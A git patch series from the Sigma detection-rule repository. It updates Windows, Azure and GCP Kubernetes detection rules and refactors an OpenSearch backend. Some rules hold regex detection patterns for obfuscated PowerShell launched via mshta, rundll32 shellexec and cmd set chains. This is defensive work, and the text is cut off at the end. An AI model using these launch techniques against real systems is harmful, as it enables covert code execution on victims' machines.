9ba4f896..ccdb7759 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_mshta_services.yml @@ -5,7 +5,7 @@ description: Detects Obfuscated Powershell via use MSHTA in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/09 -modified: 2021/05/27 +modified: 2021/08/09 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task31) tags: @@ -18,7 +18,7 @@ falsepositives: level: high detection: selection: - - ImagePath|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' + ImagePath|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' condition: selection and selection_eventid --- logsource: diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services.yml index 84bf36fd..4c2297a6 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_use_rundll32_services.yml @@ -5,7 +5,7 @@ description: Detects Obfuscated Powershell via use Rundll32 in Scripts status: experimental author: Nikita Nazarov, oscd.community date: 2020/10/09 -modified: 2021/05/27 +modified: 2021/08/09 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task30) tags: @@ -18,7 +18,7 @@ falsepositives: level: high detection: selection: - - ImagePath|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' + ImagePath|re: '(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"' condition: selection and selection_eventid --- logsource: diff --git a/rules/windows/builtin/win_invoke_obfuscation_via_var++_services.yml b/rules/windows/builtin/win_invoke_obfuscation_via_var++_services.yml index aaa51e80..e042bb14 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_via_var++_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_via_var++_services.yml @@ -5,6 +5,7 @@ description: Detects Obfuscated Powershell via VAR++ LAUNCHER status: experimental author: Timur Zinniatullin, oscd.community date: 2020/10/13 +modified: 2021/08/09 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task27) tags: @@ -17,7 +18,7 @@ falsepositives: level: high detection: selection: - - ImagePath|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r + ImagePath|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r condition: selection and selection_eventid --- logsource: diff --git a/rules/windows/builtin/win_susp_failed_logons_explicit_credentials.yml b/rules/windows/builtin/win_susp_failed_logons_explicit_credentials.yml index a64133d2..95efe7d8 100644 --- a/rules/windows/builtin/win_susp_failed_logons_explicit_credentials.yml +++ b/rules/windows/builtin/win_susp_failed_logons_explicit_credentials.yml @@ -3,6 +3,7 @@ id: 196a29c2-e378-48d8-ba07-8a9e61f7fab9 description: Detects a source user failing to authenticate with multiple users using explicit credentials on a host. author: Mauricio Velazco date: 2021/06/01 +modified: 2021/08/09 references: - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying tags: @@ -14,7 +15,7 @@ logsource: service: security detection: selection1: - EventID: '4648' + EventID: 4648 timeframe: 24h condition: - selection1 | count(Account_Name) by ComputerName > 10 diff --git a/rules/windows/builtin/win_susp_raccess_sensitive_fext.yml b/rules/windows/builtin/win_susp_raccess_sensitive_fext.yml index 66caa1f7..cb04f62a 100644 --- a/rules/windows/builtin/win_susp_raccess_sensitive_fext.yml +++ b/rules/windows/builtin/win_susp_raccess_sensitive_fext.yml @@ -3,7 +3,7 @@ id: 91c945bc-2ad1-4799-a591-4d00198a1215 description: Detects known sensitive file extensions accessed on a network share author: Samir Bousseaden date: 2019/04/03 -modified: 2020/08/23 +modified: 2021/08/09 tags: - attack.collection - attack.t1039 @@ -12,8 +12,7 @@ logsource: service: security detection: selection: - EventID: - - 5145 + EventID: 5145 RelativeTargetName|endswith: - '.pst' - '.ost' diff --git a/rules/windows/builtin/win_vul_cve_2020_0688.yml b/rules/windows/builtin/win_vul_cve_2020_0688.yml index 51a0902c..b34e251e 100644 --- a/rules/windows/builtin/win_vul_cve_2020_0688.yml +++ b/rules/windows/builtin/win_vul_cve_2020_0688.yml @@ -7,7 +7,7 @@ references: - https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/ author: Florian Roth, wagga date: 2020/02/29 -modified: 2021/06/27 +modified: 2021/08/09 tags: - attack.initial_access - attack.t1190 @@ -20,8 +20,7 @@ detection: Source: MSExchange Control Panel Level: Error selection2: - Message|contains: - - '&__VIEWSTATE=' + Message|contains: '&__VIEWSTATE=' condition: selection1 and selection2 falsepositives: - Unknown diff --git a/rules/windows/builtin/win_vul_cve_2020_1472.yml b/rules/windows/builtin/win_vul_cve_2020_1472.yml index 992ca7a2..7210bd7e 100644 --- a/rules/windows/builtin/win_vul_cve_2020_1472.yml +++ b/rules/windows/builtin/win_vul_cve_2020_1472.yml @@ -6,6 +6,7 @@ references: - https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc author: NVISO date: 2020/09/15 +modified: 2021/08/09 tags: - attack.privilege_escalation logsource: @@ -13,8 +14,7 @@ logsource: service: system detection: selection: - EventID: - - 5829 + EventID: 5829 condition: selection fields: - SAMAccountName From c3efcbe2925d62190c424aedb9f2b8b6bcd92ac5 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 9 Aug 2021 14:30:57 -0500 Subject: [PATCH 0269/1367] Update azure_network_virtual_device_modified_or_deleted.yml --- .../cloud/azure_network_virtual_device_modified_or_deleted.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/rules/cloud/azure_network_virtual_device_modified_or_deleted.yml b/rules/cloud/azure_network_virtual_device_modified_or_deleted.yml index 5a5ec909..4034c0ce 100644 --- a/rules/cloud/azure_network_virtual_device_modified_or_deleted.yml +++ b/rules/cloud/azure_network_virtual_device_modified_or_deleted.yml @@ -11,6 +11,8 @@ logsource: detection: selection: properties.message: + - MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS/WRITE + - MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS/DELETE - MICROSOFT.NETWORK/NETWORKINTERFACES/WRITE - MICROSOFT.NETWORK/NETWORKINTERFACES/JOIN/ACTION - MICROSOFT.NETWORK/NETWORKINTERFACES/DELETE From 70e2bb06a29e7ec6b3ebe8ae625bc18016e638cc Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 9 Aug 2021 14:35:27 -0500 Subject: [PATCH 0270/1367] Update azure_vpn_connection_modified_or_deleted.yml --- rules/cloud/azure_vpn_connection_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure_vpn_connection_modified_or_deleted.yml b/rules/cloud/azure_vpn_connection_modified_or_deleted.yml index 57880f26..50dc3a56 100644 --- a/rules/cloud/azure_vpn_connection_modified_or_deleted.yml +++ b/rules/cloud/azure_vpn_connection_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Azure VPN Connection Modified or Deleted id: 61171ffc-d79c-4ae5-8e10-9323dba19cd3 description: Identifies when a VPN connection is modified or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/08 references: From 27ce5575626c41a69cd6177ced28cd4cadaa2b4b Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 9 Aug 2021 14:35:45 -0500 Subject: [PATCH 0271/1367] Update azure_virtual_network_modified_or_deleted.yml --- rules/cloud/azure_virtual_network_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure_virtual_network_modified_or_deleted.yml b/rules/cloud/azure_virtual_network_modified_or_deleted.yml index fd261ea6..68f2c755 100644 --- a/rules/cloud/azure_virtual_network_modified_or_deleted.yml +++ b/rules/cloud/azure_virtual_network_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Azure Virtual Network Modified or Deleted id: bcfcc962-0e4a-4fd9-84bb-a833e672df3f description: Identifies when a Virtual Network is modified or deleted in Azure. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/08 references: From b9026f2dfeda481af2d3058a5fa73d6278e968e0 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 9 Aug 2021 14:36:50 -0500 Subject: [PATCH 0272/1367] Update azure_dns_zone_modified_or_deleted.yml --- rules/cloud/azure_dns_zone_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure_dns_zone_modified_or_deleted.yml b/rules/cloud/azure_dns_zone_modified_or_deleted.yml index db8e8c52..0cdc2247 100644 --- a/rules/cloud/azure_dns_zone_modified_or_deleted.yml +++ b/rules/cloud/azure_dns_zone_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Azure DNS Zone Modified or Deleted id: af6925b0-8826-47f1-9324-337507a0babd description: Identifies when DNS zone is modified or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/08 references: From 1f1aa7c31f0b38f4bef54835c22d9351c21ab3df Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 9 Aug 2021 14:38:15 -0500 Subject: [PATCH 0273/1367] Update azure_dns_zone_modified_or_deleted.yml --- .../azure_dns_zone_modified_or_deleted.yml | 27 +++---------------- 1 file changed, 4 insertions(+), 23 deletions(-) diff --git a/rules/cloud/azure_dns_zone_modified_or_deleted.yml b/rules/cloud/azure_dns_zone_modified_or_deleted.yml index 0cdc2247..6028af1f 100644 --- a/rules/cloud/azure_dns_zone_modified_or_deleted.yml +++ b/rules/cloud/azure_dns_zone_modified_or_deleted.yml @@ -10,29 +10,10 @@ logsource: service: azure.activitylogs detection: selection: - properties.message: - - MICROSOFT.NETWORK/DNSZONES/WRITE - - MICROSOFT.NETWORK/DNSZONES/DELETE - - MICROSOFT.NETWORK/DNSZONES/A/WRITE - - MICROSOFT.NETWORK/DNSZONES/A/DELETE - - MICROSOFT.NETWORK/DNSZONES/AAAA/WRITE - - MICROSOFT.NETWORK/DNSZONES/AAAA/DELETE - - MICROSOFT.NETWORK/DNSZONES/CAA/READ - - MICROSOFT.NETWORK/DNSZONES/CAA/WRITE - - MICROSOFT.NETWORK/DNSZONES/CAA/DELETE - - MICROSOFT.NETWORK/DNSZONES/CNAME/WRITE - - MICROSOFT.NETWORK/DNSZONES/CNAME/DELETE - - MICROSOFT.NETWORK/DNSZONES/MX/WRITE - - MICROSOFT.NETWORK/DNSZONES/MX/DELETE - - MICROSOFT.NETWORK/DNSZONES/NS/WRITE - - MICROSOFT.NETWORK/DNSZONES/NS/DELETE - - MICROSOFT.NETWORK/DNSZONES/PTR/WRITE - - MICROSOFT.NETWORK/DNSZONES/PTR/DELETE - - MICROSOFT.NETWORK/DNSZONES/SOA/WRITE - - MICROSOFT.NETWORK/DNSZONES/SRV/WRITE - - MICROSOFT.NETWORK/DNSZONES/SRV/DELETE - - MICROSOFT.NETWORK/DNSZONES/TXT/WRITE - - MICROSOFT.NETWORK/DNSZONES/TXT/DELETE + properties.message|startswith: MICROSOFT.NETWORK/DNSZONES + properties.message|endswith: + - /WRITE + - /DELETE condition: selection level: medium tags: From 5b25f56964e7152ad2a5c9a50c5f7905f6a3e99e Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 9 Aug 2021 15:36:30 -0500 Subject: [PATCH 0274/1367] Update azure_network_security_modified_or_deleted.yml --- rules/cloud/azure_network_security_modified_or_deleted.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/cloud/azure_network_security_modified_or_deleted.yml b/rules/cloud/azure_network_security_modified_or_deleted.yml index 1c62b1e1..75b3733f 100644 --- a/rules/cloud/azure_network_security_modified_or_deleted.yml +++ b/rules/cloud/azure_network_security_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Azure Network Security Configuration Modified or Deleted id: d22b4df4-5a67-4859-a578-8c9a0b5af9df description: Identifies when a network security configuration is modified or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/08 references: @@ -15,6 +15,8 @@ detection: - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/DELETE - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/SECURITYRULES/WRITE - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/SECURITYRULES/DELETE + - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/JOIN/ACTION + - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/PROVIDERS/MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/WRITE condition: selection level: medium tags: From 27441d70932120bd37f74c90c915df3f2b9f4da8 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 9 Aug 2021 15:37:53 -0500 Subject: [PATCH 0275/1367] Update azure_network_p2s_vpn_modified_or_deleted.yml --- rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml b/rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml index d65d147d..bea054aa 100644 --- a/rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml +++ b/rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml @@ -13,6 +13,10 @@ detection: properties.message: - MICROSOFT.NETWORK/P2SVPNGATEWAYS/WRITE - MICROSOFT.NETWORK/P2SVPNGATEWAYS/DELETE + - MICROSOFT.NETWORK/P2SVPNGATEWAYS/RESET/ACTION + - MICROSOFT.NETWORK/P2SVPNGATEWAYS/GENERATEVPNPROFILE/ACTION + - MICROSOFT.NETWORK/P2SVPNGATEWAYS/DISCONNECTP2SVPNCONNECTIONS/ACTION + - MICROSOFT.NETWORK/P2SVPNGATEWAYS/PROVIDERS/MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/WRITE condition: selection level: medium tags: From fa54a383940a5ff00f65bb088b7bda14c51ea564 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 9 Aug 2021 15:51:43 -0500 Subject: [PATCH 0276/1367] Update azure_virtual_network_modified_or_deleted.yml --- .../azure_virtual_network_modified_or_deleted.yml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/rules/cloud/azure_virtual_network_modified_or_deleted.yml b/rules/cloud/azure_virtual_network_modified_or_deleted.yml index 68f2c755..cf322fa2 100644 --- a/rules/cloud/azure_virtual_network_modified_or_deleted.yml +++ b/rules/cloud/azure_virtual_network_modified_or_deleted.yml @@ -10,11 +10,12 @@ logsource: service: azure.activitylogs detection: selection: - properties.message: - - MICROSOFT.NETWORK/VIRTUALNETWORKGATEWAYS/WRITE - - MICROSOFT.NETWORK/VIRTUALNETWORKGATEWAYS/DELETE - - MICROSOFT.NETWORK/VIRTUALNETWORKS/WRITE - - MICROSOFT.NETWORK/VIRTUALNETWORKS/DELETE + properties.message|startswith: + - MICROSOFT.NETWORK/VIRTUALNETWORKGATEWAYS/ + - MICROSOFT.NETWORK/VIRTUALNETWORKS/ + properties.message|endswith: + - /WRITE + - /DELETE condition: selection level: medium tags: From 6474968615ae90cdba0b582ef1f39150b58c66e4 Mon Sep 17 00:00:00 2001 From: Young Date: Mon, 9 Aug 2021 14:42:17 -0700 Subject: [PATCH 0277/1367] added helper functions to clean up code --- .../sigma/backends/defaultOpensearchValues.py | 7 +- tools/sigma/backends/opensearch.py | 293 ++++-------------- 2 files changed, 68 insertions(+), 232 deletions(-) diff --git a/tools/sigma/backends/defaultOpensearchValues.py b/tools/sigma/backends/defaultOpensearchValues.py index b31d28c6..87f0a582 100644 --- a/tools/sigma/backends/defaultOpensearchValues.py +++ b/tools/sigma/backends/defaultOpensearchValues.py @@ -4,8 +4,7 @@ INTERVAL = 5 UNIT = "MINUTES" TRIGGER_NAME = "generated-trigger" SEVERITIES = {"informational": "5", "low": "4", "medium": "3", "high": "2", "critical": "1"} -RESULTS_INDEX = 0 -TRIGGER_INEQUALITY = ">" -TRIGGER_THRESHOLD = 0 +TRIGGER_SCRIPT = "ctx.results[0].hits.total.value > 0" TRIGGER_LANGUAGE = "painless" -MONITOR_INDICES = ["opensearch-security-logs"] \ No newline at end of file +MONITOR_INDICES = ["opensearch-security-logs"] +NUM_RESULTS = 1 \ No newline at end of file diff --git a/tools/sigma/backends/opensearch.py b/tools/sigma/backends/opensearch.py index c57f7cbd..825caa73 100644 --- a/tools/sigma/backends/opensearch.py +++ b/tools/sigma/backends/opensearch.py @@ -32,213 +32,10 @@ from sigma.config.mapping import ConditionalFieldMapping from .base import BaseBackend, SingleTextQueryBackend from .mixins import RulenameCommentMixin, MultiRuleOutputMixin from .exceptions import NotSupportedError +from .elasticsearch import DeepFieldMappingMixin, ElasticsearchWildcardHandlingMixin from .defaultOpensearchValues import * -class DeepFieldMappingMixin(object): - def fieldNameMapping(self, fieldname, value): - if isinstance(fieldname, str): - get_config = self.sigmaconfig.fieldmappings.get(fieldname) - if not get_config and '|' in fieldname: - fieldname = fieldname.split('|', 1)[0] - get_config = self.sigmaconfig.fieldmappings.get(fieldname) - if isinstance(get_config, ConditionalFieldMapping): - condition = self.sigmaconfig.fieldmappings.get(fieldname).conditions - for key, item in self.logsource.items(): - if condition.get(key) and condition.get(key, {}).get(item): - new_fieldname = condition.get(key, {}).get(item) - if any(new_fieldname): - return super().fieldNameMapping(new_fieldname[0], value) - return super().fieldNameMapping(fieldname, value) - - def generate(self, sigmaparser): - self.logsource = sigmaparser.parsedyaml.get("logsource", {}) - return super().generate(sigmaparser) - -class OpenSearchWildcardHandlingMixin(object): - """ - Determine field mapping to keyword subfields depending on existence of wildcards in search values. Further, - provide configurability with backend parameters. - """ - options = SingleTextQueryBackend.options + ( - ("keyword_field", "keyword", "Keyword sub-field name (default is: '.keyword'). Set blank value if all keyword fields are the base(top-level) field. Additionally see 'keyword_base_fields' for more granular control of the base & subfield situation.", None), - ("analyzed_sub_field_name", "", "Analyzed sub-field name. By default analyzed field is the base field. Therefore, use this option to make the analyzed field a subfield. An example value would be '.text' ", None), - ("analyzed_sub_fields", None, "Fields that have an analyzed sub-field.", None), - ("keyword_base_fields", None, "Fields that the keyword is base (top-level) field. By default analyzed field is the base field. So use this option to change that logic. Valid options are: list of fields, single field. Also, wildcards * and ? allowed.", None), - ("keyword_whitelist", None, "Fields to always set as keyword. Bypasses case insensitive options. Valid options are: list of fields, single field. Also, wildcards * and ? allowed.", None), - ("keyword_blacklist", None, "Fields to never set as keyword (ie: always set as analyzed field). Bypasses case insensitive options. Valid options are: list of fields, single field. Also, wildcards * and ? allowed.", None), - ("case_insensitive_whitelist", None, "Fields to make the values case insensitive regex. Automatically sets the field as a keyword. Valid options are: list of fields, single field. Also, wildcards * and ? allowed.", None), - ("case_insensitive_blacklist", None, "Fields to exclude from being made into case insensitive regex. Valid options are: list of fields, single field. Also, wildcards * and ? allowed.", None), - ("wildcard_use_keyword", "true", "Use analyzed field or wildcard field if the query uses a wildcard value (ie: '*mall_wear.exe'). Set this to 'False' to use analyzed field or wildcard field. Valid options are: true/false", None), - ) - reContainsWildcard = re.compile("(?:(?\\*", value ) - # Make upper/lower - value = re.sub( r"[A-Za-z]", lambda x: "[" + x.group( 0 ).upper() + x.group( 0 ).lower() + "]", value ) - # Turn `.` into wildcard, only if odd number of '\'(because this would mean already escaped) - value = re.sub( r"(((?\.", value ) - # Turn `*` into wildcard, only if odd number of '\'(because this would mean already escaped) - value = re.sub( r"(((?.*", value ) - # Escape additional values that are treated as specific "operators" within Elastic. (ie: @, ?, &, <, >, and ~) - # reference: https://www.elastic.co/guide/en/elasticsearch/reference/current/regexp-syntax.html#regexp-optional-operators - value = re.sub( r"(((?])", "\g<1>\\\\\g<4>", value ) - # Validate regex - try: - re.compile(value) - return {'is_regex': True, 'value': value} - # Regex failed - except re.error: - raise TypeError( "Regular expression validation error for: '%s')" %str(value) ) - else: - return { 'is_regex': False, 'value': value } - -class OpenSearchQuerystringBackend(DeepFieldMappingMixin, OpenSearchWildcardHandlingMixin, SingleTextQueryBackend): +class OpenSearchQuerystringBackend(DeepFieldMappingMixin, ElasticsearchWildcardHandlingMixin, SingleTextQueryBackend): """Converts Sigma rule into OpenSearch query string. Only searches, no aggregations.""" identifier = "es-qs" active = True @@ -303,7 +100,7 @@ class OpenSearchQuerystringBackend(DeepFieldMappingMixin, OpenSearchWildcardHand return super().generateSubexpressionNode(node) class OpenSearchBackend(object): - """Elasticsearch detection rule backend""" + """OpenSearch detection rule backend""" active = True uuid_black_list = [] options = OpenSearchQuerystringBackend.options + ( @@ -334,10 +131,15 @@ class OpenSearchBackend(object): print("Failed to parse {} configuration file '%s' as valid YAML: %s" % (path, str(e)), file=sys.stderr) return [] + ''' + Calls parent generate methods to retrieve Sigma rule condition as Elastic Common Schema query. + Then calls the create_rule method to return final translated object. + ''' def generate(self, sigmaparser): # reset per-detection variables self.rule_threshold = {} translation = super().generate(sigmaparser) + print(f'translation: {translation}\n') if translation: index = sigmaparser.get_logsource().index if len(index) == 0: @@ -347,6 +149,9 @@ class OpenSearchBackend(object): rule = self.create_rule(configs, index) return rule + ''' + Generates threat detection for OpenSearch monitor, which compiles tactics and techniques found in Sigma tags. + ''' def create_threat_description(self, tactics_list, techniques_list): threat_list = list() for tactic in tactics_list: @@ -370,6 +175,9 @@ class OpenSearchBackend(object): threat_list.append(temp_tactics) return threat_list + ''' + Finds tactics mentioned in Sigma tags. + ''' def find_tactics(self, key_name=None, key_id=None): for tactic in self.tactics: if key_name and key_name == tactic.get("tactic", ""): @@ -377,11 +185,17 @@ class OpenSearchBackend(object): if key_id and key_id == tactic.get("external_id", ""): return tactic + ''' + Finds techniques mentioned in Sigma tags. + ''' def find_technique(self, key_id=None): for technique in self.techniques: if key_id and key_id == technique.get("technique_id", ""): return technique + ''' + Maps Sigma severity to OpenSearch numerical severity from 1-5. + ''' def map_severity(self, severity): severity = severity.lower() return SEVERITIES[severity] if severity in SEVERITIES else SEVERITIES["medium"] @@ -393,7 +207,7 @@ class OpenSearchBackend(object): "severity": self.map_severity(severity), "condition": { "script": { - "source": f'ctx.results[{RESULTS_INDEX}].hits.total.value {TRIGGER_INEQUALITY} {TRIGGER_THRESHOLD}', + "source": f'{TRIGGER_SCRIPT}', "lang": TRIGGER_LANGUAGE } }, @@ -401,25 +215,31 @@ class OpenSearchBackend(object): } ] - # Only supports must and must_not queries - def build_query(self): + ''' + Builds OpenSearch monitor query from translated Elastic Common Schema query. + Only supports must and must_not clauses. + ''' + def build_query(self, translation): return { "bool": { "must": { - "match_all": {} + "match_all": translation } } } - def build_inputs(self): + ''' + Builds inputs field of OS monitor. + ''' + def build_inputs(self, translation): return [ { "search": { "index": MONITOR_INDICES, "query": { - "size": 0, # don't know what this field represents, but default to 0 + "size": NUM_RESULTS, "aggregations": {}, - "query": self.build_query() + "query": self.build_query(translation) } } } @@ -445,11 +265,10 @@ class OpenSearchBackend(object): new_ref = yml_filename return new_ref - def create_rule(self, configs, index): - tags = configs.get("tags", []) + def build_tags_list(self, tags): tactics_list = list() - technics_list = list() new_tags = list() + technics_list = list() for tag in tags: tag = tag.replace("attack.", "") @@ -476,7 +295,7 @@ class OpenSearchBackend(object): if tact: new_tags.append(tag.title()) tactics_list.append(tact) - + if self.custom_tag: if ',' in self.custom_tag: tag_split = self.custom_tag.split(",") @@ -484,21 +303,38 @@ class OpenSearchBackend(object): new_tags.append(l_tag) else: new_tags.append(self.custom_tag) - - threat = self.create_threat_description(tactics_list=tactics_list, techniques_list=technics_list) - rule_name = configs.get("title", "") - rule_description = configs.get("description", "") - rule_uuid = configs.get("id", "").lower() + + return tactics_list, technics_list, new_tags + + ''' + Get the rule id of the Sigma rule. If the rule id is blank or isn't unique, generate a random one. + ''' + def get_rule_id(self, rule_uuid): + rule_uuid = rule_uuid.lower() if rule_uuid == "" or rule_uuid in self.uuid_black_list: rule_uuid = str(uuid4()) self.uuid_black_list.append(rule_uuid) rule_id = re.sub(re.compile('[()*+!,\[\].\s"]'), "_", rule_uuid) - inputs = self.build_inputs() - triggers = self.create_trigger(configs.get("level", "medium")) - references = configs.get("reference") - if references is None: - references = configs.get("references") + + return rule_id + + def create_rule(self, configs, index): + tactics_list, technics_list, new_tags = self.build_tags_list(configs.get("tags", [])) + threat = self.create_threat_description(tactics_list, technics_list) + + rule_name = configs.get("title", "") + + rule_description = configs.get("description", "") + + rule_id = self.get_rule_id(configs.get("id", "")) + + inputs = self.build_inputs(configs.get("translation", "")) + + triggers = self.create_trigger(configs.get("level", "medium")) + + references = configs.get("reference") if configs.get("reference") is not None else configs.get("references") + add_ref_yml= self.build_ymlfile_ref(configs) if add_ref_yml: if references is None: # No ref @@ -522,11 +358,12 @@ class OpenSearchBackend(object): "inputs": inputs, "tags": new_tags, "triggers": triggers, - "meta_data": { + "sigma_data": { "rule_id": rule_id, "threat": threat } } + if references: rule.update({"references": references}) return json.dumps(rule) From 4542ab9a14d9b0fb96b04bcc54f187bf84c7fc55 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 9 Aug 2021 22:01:16 -0500 Subject: [PATCH 0278/1367] Create gcp_kubernetes_rolebinding.yml --- rules/cloud/gcp_kubernetes_rolebinding.yml | 32 ++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 rules/cloud/gcp_kubernetes_rolebinding.yml diff --git a/rules/cloud/gcp_kubernetes_rolebinding.yml b/rules/cloud/gcp_kubernetes_rolebinding.yml new file mode 100644 index 00000000..1d687cce --- /dev/null +++ b/rules/cloud/gcp_kubernetes_rolebinding.yml @@ -0,0 +1,32 @@ +title: Google Cloud Kubernetes RoleBinding +id: 2f0bae2d-bf20-4465-be86-1311addebaa3 +description: Detects the creation or patching of potential malicious RoleBinding. This includes RoleBindings and ClusterRoleBinding. +author: Austin Songer +status: experimental +date: 2021/08/09 +references: + - https://github.com/elastic/detection-rules/pull/1267 + - https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole + - https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control + - https://kubernetes.io/docs/reference/access-authn-authz/rbac/ + - https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging +logsource: + service: gcp.audit +detection: + selection: + properties.message: + - io.k8s.authorization.rbac.v*.clusterrolebindings.create or + - io.k8s.authorization.rbac.v*.rolebindings.create or + - io.k8s.authorization.rbac.v*.clusterrolebindings.patch or + - io.k8s.authorization.rbac.v*.rolebindings.patch or + - io.k8s.authorization.rbac.v*.clusterrolebindings.update or + - io.k8s.authorization.rbac.v*.rolebindings.update + - io.k8s.authorization.rbac.v*.clusterrolebindings.delete or + - io.k8s.authorization.rbac.v*.rolebindings.delete + condition: selection +level: medium +tags: + - attack.credential_access +falsepositives: + - RoleBindings and ClusterRoleBinding being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - RoleBindings and ClusterRoleBinding modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 019bdaac9083ddb172b0ce50d2deb54675050ea2 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 9 Aug 2021 22:05:46 -0500 Subject: [PATCH 0279/1367] Update gcp_kubernetes_rolebinding.yml --- rules/cloud/gcp_kubernetes_rolebinding.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/gcp_kubernetes_rolebinding.yml b/rules/cloud/gcp_kubernetes_rolebinding.yml index 1d687cce..d920ae69 100644 --- a/rules/cloud/gcp_kubernetes_rolebinding.yml +++ b/rules/cloud/gcp_kubernetes_rolebinding.yml @@ -14,7 +14,7 @@ logsource: service: gcp.audit detection: selection: - properties.message: + eventName: - io.k8s.authorization.rbac.v*.clusterrolebindings.create or - io.k8s.authorization.rbac.v*.rolebindings.create or - io.k8s.authorization.rbac.v*.clusterrolebindings.patch or From 23d5ed9d23d8a4e1b43fed2b0cefbf1b879f93c2 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 9 Aug 2021 22:06:56 -0500 Subject: [PATCH 0280/1367] Create gcp_kubernetes_secrets_modified_or_deleted.yml --- ...kubernetes_secrets_modified_or_deleted.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml diff --git a/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml b/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml new file mode 100644 index 00000000..8b78f993 --- /dev/null +++ b/rules/cloud/gcp_kubernetes_secrets_modified_or_deleted.yml @@ -0,0 +1,24 @@ +title: Google Cloud Kubernetes Secrets Modified or Deleted +id: 2f0bae2d-bf20-4465-be86-1311addebaa3 +description: Identifies when the Secrets are Modified or Deleted. +author: Austin Songer +status: experimental +date: 2021/08/09 +references: + - https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging +logsource: + service: gcp.audit +detection: + selection: + eventName: + - io.k8s.core.v*.secrets.create + - io.k8s.core.v*.secrets.update + - io.k8s.core.v*.secrets.patch + - io.k8s.core.v*.secrets.delete + condition: selection +level: medium +tags: + - attack.credential_access +falsepositives: + - Secrets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is 